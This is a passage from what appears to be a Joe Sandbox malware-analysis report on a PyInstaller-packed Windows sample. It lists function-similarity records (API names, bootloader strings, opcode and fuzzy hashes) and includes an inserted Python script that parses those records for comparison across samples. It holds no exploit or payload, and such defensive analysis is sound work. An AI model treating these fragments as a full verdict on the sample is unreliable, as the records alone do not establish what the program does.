                                                    • Instruction ID: 502ae27ed876f42434a1653eca015659a723e0e93e0846f74c41cc4db3e204bd
                                                    • Opcode Fuzzy Hash: a12511eb413a20500788068782fa49ddb1fe92b02a1e7189881bce5d81ea64e9
                                                    • Instruction Fuzzy Hash: 2B11D821A0C6A341EE649F119C1027DA3A0BF96B88F5C4039EA8CE7796DFBED4008740
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 14b88cdde8f100e0c11df9c25968cfa6048feb9caeb9ba24198eb79990a08c61
                                                    • Instruction ID: 4a1074f9b3cffe1422d503fc7bf9ec147f3374a5b988c7945da139c3c503f9fa
                                                    • Opcode Fuzzy Hash: 14b88cdde8f100e0c11df9c25968cfa6048feb9caeb9ba24198eb79990a08c61
                                                    • Instruction Fuzzy Hash: 5621A772A18A5246DB618F18F85037A77A1EB84B98F584238E65DD76D9DF7CD801CB00
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: cb4a28c9cfe68d4bf5caf65282be0dfe2d74942f75b7edef78e8fd4dc80d0569
                                                    • Instruction ID: 37fa9f3cf19230278f6c098612e758b13bed30dfd683c6c9727a03ce544ec5fc
                                                    • Opcode Fuzzy Hash: cb4a28c9cfe68d4bf5caf65282be0dfe2d74942f75b7edef78e8fd4dc80d0569
                                                    • Instruction Fuzzy Hash: 2501C861A0876342EA05DB52AC0007DA7A5BF46FE8F4C4639DE5CB7BDADEBDE1018300
                                                    APIs
                                                    • HeapAlloc.KERNEL32(?,?,00000000,00007FF652EEC196,?,?,?,00007FF652EEB35B,?,?,00000000,00007FF652EEB5F6), ref: 00007FF652EEF99D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: AllocHeap
                                                    • String ID:
                                                    • API String ID: 4292702814-0
                                                    • Opcode ID: 83da86fcac40c5efe6be46efa8cccb7ed61db28345aee0e9c2556edc7e0339ef
                                                    • Instruction ID: f2df9a9c7ede13a890edcfa90dfe153f4e4428a6de6420e531c66e5acef6bcf3
                                                    • Opcode Fuzzy Hash: 83da86fcac40c5efe6be46efa8cccb7ed61db28345aee0e9c2556edc7e0339ef
                                                    • Instruction Fuzzy Hash: EEF02401F0A72391FE5457E1AC603B512904FA8B88F4C443CCD4EFA3C5EEDDE4808212
                                                    APIs
                                                    • HeapAlloc.KERNEL32(?,?,?,00007FF652EE1514,?,?,?,00007FF652EE2A26,?,?,?,?,?,00007FF652EE4019), ref: 00007FF652EEE3EA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: AllocHeap
                                                    • String ID:
                                                    • API String ID: 4292702814-0
                                                    • Opcode ID: d8b55510c5610d80ab4c44b86d687719a9e038cf882b555fd49ed5282eff217e
                                                    • Instruction ID: 3bb638fbe0fcaf54c0b356accb4c4e198088ae9a25376b0f5b1d5e079077cef2
                                                    • Opcode Fuzzy Hash: d8b55510c5610d80ab4c44b86d687719a9e038cf882b555fd49ed5282eff217e
                                                    • Instruction Fuzzy Hash: EBF01211F1E2B745FE5867A16C516BA51914F487B8F0C0638DD2EE67C1DEDCE481C111
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: AddressProc
                                                     • String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                    • API String ID: 190572456-4266016200
                                                    • Opcode ID: 849092ee313d90182648ac5091f6841dd271f5938a0293141bcf3cafd9cdb4f6
                                                    • Instruction ID: 3ee331b5a643e14599949abbb94bbcbdeee16feef1ad8d817a891e57cf5b6386
                                                    • Opcode Fuzzy Hash: 849092ee313d90182648ac5091f6841dd271f5938a0293141bcf3cafd9cdb4f6
                                                    • Instruction Fuzzy Hash: A412CE65A5AB2390FB15CB04BC901B527A1AF9474DF9C603DC80FB62A4EFFCF6599201
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                    • API String ID: 808467561-2761157908
                                                    • Opcode ID: c804c22466df2b92b362f5d1d066b057dea08e8c29dc99d8cb90910c2247e431
                                                    • Instruction ID: 3e03a4fa98c9d518ec9d46048902a24b9d644fa78f0713f8f9a6b9e9f04d28a7
                                                    • Opcode Fuzzy Hash: c804c22466df2b92b362f5d1d066b057dea08e8c29dc99d8cb90910c2247e431
                                                    • Instruction Fuzzy Hash: D2B2BB72E182A28BE7658F64E8807FE37A1F75474CF585139DA0DA7A84DFB8E501CB40
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,00007FF652ED2A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF652ED101D), ref: 00007FF652ED8797
                                                    • FormatMessageW.KERNEL32 ref: 00007FF652ED87C6
                                                    • WideCharToMultiByte.KERNEL32 ref: 00007FF652ED881C
                                                      • Part of subcall function 00007FF652ED29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF652ED8AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF652ED101D), ref: 00007FF652ED29F4
                                                      • Part of subcall function 00007FF652ED29C0: MessageBoxW.USER32 ref: 00007FF652ED2AD0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                    • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                    • API String ID: 2920928814-2573406579
                                                    • Opcode ID: 71548051bea7547f5d5b972cb2661fdb12455c7e02de19cea235076eba1ea75f
                                                    • Instruction ID: 51bf71cd7a72d6edf52f2de382c44d5a32179a567de33a4a0b08b3ec0b121830
                                                    • Opcode Fuzzy Hash: 71548051bea7547f5d5b972cb2661fdb12455c7e02de19cea235076eba1ea75f
                                                    • Instruction Fuzzy Hash: AD214F32A18A5295F760DB25FC4426A6365FF8838CF8C113DD64DE3AA5EFBCE1458700
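The two records above (the GetProcAddress resolver for the Py* C-API and the pyi_win32_utils_to_utf8 error path) identify the first-stage executable as a PyInstaller bootloader, consistent with the "Found pyInstaller with non standard icon" signature. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses this bulleted record layout into one row per function, flags the rows whose string table belongs to the PyInstaller bootloader, and builds an Instruction Fuzzy Hash index that can be diffed against another sample's report. The record-boundary rule (a new record opens at an "APIs" or "Strings" header once a Similarity block has been completed) and the "$" separator are inferred from the visible layout; SAMPLE is constructed from lines shown above with hashes truncated.

```python
"""Parse Joe Sandbox function-similarity records (APIs / Memory Dump Source /
Similarity blocks) into structured rows. Added example, not report tooling."""
import re
from typing import Dict, List

# Constructed sample: three records abbreviated from the report (hashes truncated).
SAMPLE = """\
APIs
• HeapAlloc.KERNEL32(?,?,00000000,00007FF652EEC196), ref: 00007FF652EEF99D
Memory Dump Source
• Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
• Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 83da86fcac40c5ef
• Instruction ID: f2df9a9c7ede13a8
• Instruction Fuzzy Hash: EEF02401F0A72391
APIs
• GetLastError.KERNEL32(00000000,00007FF652ED2A3E), ref: 00007FF652ED8797
• FormatMessageW.KERNEL32 ref: 00007FF652ED87C6
• WideCharToMultiByte.KERNEL32 ref: 00007FF652ED881C
  • Part of subcall function 00007FF652ED29C0: MessageBoxW.USER32 ref: 00007FF652ED2AD0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
Similarity
• API ID: ErrorLastMessage$ByteCharFormatMultiWide
• String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
• API String ID: 2920928814-2573406579
• Opcode ID: 71548051bea7547f
• Instruction ID: 51bf71cd7a72d6ed
• Instruction Fuzzy Hash: AD214F32A18A5295
Strings
Memory Dump Source
• Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
Similarity
• API ID:
• String ID: $
• API String ID: 0-227171996
• Opcode ID: a4155c6fffaecf52
• Instruction ID: adc81b12121d56f9
• Instruction Fuzzy Hash: 4AE1B272A0866782
"""

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
RECORD_START = {"APIs", "Strings"}  # a record opens with one of these headers
SEP = "$"                           # separator the report uses between IDs/strings (inferred)


def parse_records(text: str) -> List[Dict]:
    """Split the bulleted dump into one dict per function."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADERS:
            # A new record begins when an opening header follows a finished Similarity block.
            if line in RECORD_START and cur is not None and "fuzzy_hash" in cur:
                records.append(cur)
                cur = None
            if cur is None:
                cur = {"apis": [], "dump_sources": [], "api_ids": [], "strings": []}
            section = line
            continue
        if not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            cur["apis"].append(body)          # includes "Part of subcall function" sub-bullets
        elif section == "Memory Dump Source":
            cur["dump_sources"].append(body)
        elif section == "Similarity":
            key, _, value = body.partition(":")
            key, value = key.strip(), value.strip()
            if key == "API ID":
                cur["api_ids"] = [v for v in value.split(SEP) if v]
            elif key == "String ID":
                cur["strings"] = [v for v in value.split(SEP) if v]
            elif key == "Opcode ID":
                cur["opcode_id"] = value
            elif key == "Instruction ID":
                cur["instruction_id"] = value
            elif key == "Instruction Fuzzy Hash":
                cur["fuzzy_hash"] = value
    if cur is not None:
        records.append(cur)
    return records


def pyinstaller_records(records: List[Dict]) -> List[Dict]:
    """Rows whose string table belongs to the PyInstaller bootloader."""
    return [r for r in records
            if any("PyInstaller" in s or s.startswith("Failed to get address for Py")
                   for s in r["strings"])]


def fuzzy_hash_index(records: List[Dict]) -> Dict[str, str]:
    """Instruction Fuzzy Hash -> Opcode ID; the pair to compare with another sample's report."""
    return {r["fuzzy_hash"]: r["opcode_id"] for r in records if "fuzzy_hash" in r}


def imported_api_names(records: List[Dict]) -> List[str]:
    """Win32 functions actually referenced in the APIs bullets, e.g. 'HeapAlloc.KERNEL32'."""
    names = set()
    for r in records:
        for call in r["apis"]:
            m = re.search(r"([A-Za-z0-9_]+\.[A-Z0-9]+)", call)
            if m:
                names.add(m.group(1))
    return sorted(names)


if __name__ == "__main__":
    rows = parse_records(SAMPLE)
    print(f"{len(rows)} functions, {len(pyinstaller_records(rows))} PyInstaller-bootloader functions")
    print("APIs:", ", ".join(imported_api_names(rows)))
```

Run it against the full report text (copy the records section into a file and pass it to parse_records) and the fuzzy-hash index from two samples can be intersected to see which bootloader functions are shared byte-for-byte versus which differ, which is what separates a stock PyInstaller stub from a modified one.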
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 3140674995-0
                                                    • Opcode ID: 4f1605a870b3ab58307638b90f69401c730c876d9dfa7ce500e329c816792819
                                                    • Instruction ID: 9c9fddb7a2417419a48a1308490ecb0dc1d38454205676199610756d93eef377
                                                    • Opcode Fuzzy Hash: 4f1605a870b3ab58307638b90f69401c730c876d9dfa7ce500e329c816792819
                                                    • Instruction Fuzzy Hash: 11313C73619A9186EB60DF60E8407EE7364FB84748F08503EDA4EA7B94DF78D648C710
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 1239891234-0
                                                    • Opcode ID: f3d77d60e417bce1f0fe908812719be64cab24703666754eed0168e01bd0a785
                                                    • Instruction ID: 1bee17907e66fc859bffdbd4139d153215a69385482ffacc9c98ce8ffdfcedbb
                                                    • Opcode Fuzzy Hash: f3d77d60e417bce1f0fe908812719be64cab24703666754eed0168e01bd0a785
                                                    • Instruction Fuzzy Hash: 33318736618F9285E760CF25EC402AE73A5FB88758F580139EA8DA3B54EF7CD559C700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: FileFindFirst_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 2227656907-0
                                                    • Opcode ID: b3715d4618dde4abce6a703dfc2b0a62f6c41887aa9418885becb382e3094c85
                                                    • Instruction ID: 215221bfaeb12fdb2ba672aa94483a260886313c4c31a514e5c5c7e20fad7ffe
                                                    • Opcode Fuzzy Hash: b3715d4618dde4abce6a703dfc2b0a62f6c41887aa9418885becb382e3094c85
                                                    • Instruction Fuzzy Hash: 73B1A526B186A741EE61DB25BC101BA6351FB44BE8F48513AEE5DA7BC9DFBCE441C300
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                    • String ID:
                                                    • API String ID: 2933794660-0
                                                    • Opcode ID: 9121cd0992376079c28b7b15cfb2bb882a77f2b3c78bb4ce64e2c22522254d02
                                                    • Instruction ID: ee7c2f503427e826740fe495d2ad8bfad4ed126e8cc47d65c1cca5953b15be88
                                                    • Opcode Fuzzy Hash: 9121cd0992376079c28b7b15cfb2bb882a77f2b3c78bb4ce64e2c22522254d02
                                                    • Instruction Fuzzy Hash: 60114822B54F018AEB00CF60FC442A933A4FB18B58F081E35DA6DA27A4DFB8E1588340
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: memcpy_s
                                                    • String ID:
                                                    • API String ID: 1502251526-0
                                                    • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                    • Instruction ID: 8429646ca80192e79eddfa1bd9a4f3a0c48c5aec866a0cf9079fe7ebef69365b
                                                    • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                    • Instruction Fuzzy Hash: B8C12772B1869687E724CF19B4446ABB7A1F784B88F499138DB4E97744DF7DE801CB00
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ExceptionRaise_clrfp
                                                    • String ID:
                                                    • API String ID: 15204871-0
                                                    • Opcode ID: 107d115b060fbd35a116a220a90c3f58689526778be32960ff8b0eb29206904d
                                                    • Instruction ID: 76c3338278c15cc10c43618707dbdac86042215a26cfa29692d999d4f47ce9bb
                                                    • Opcode Fuzzy Hash: 107d115b060fbd35a116a220a90c3f58689526778be32960ff8b0eb29206904d
                                                    • Instruction Fuzzy Hash: 39B18A73A04B998BEB15CF29D8863693BA0F744B8CF198829DA9D877A4CF79D451C700
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $
                                                    • API String ID: 0-227171996
                                                    • Opcode ID: a4155c6fffaecf52a824239c2b6f37dbc1b24f1087258a4a4fa2a9ab421e67c4
                                                    • Instruction ID: adc81b12121d56f9e4311b80ef1d43569e8048f9adb0fd5a825dbbd610baf62a
                                                    • Opcode Fuzzy Hash: a4155c6fffaecf52a824239c2b6f37dbc1b24f1087258a4a4fa2a9ab421e67c4
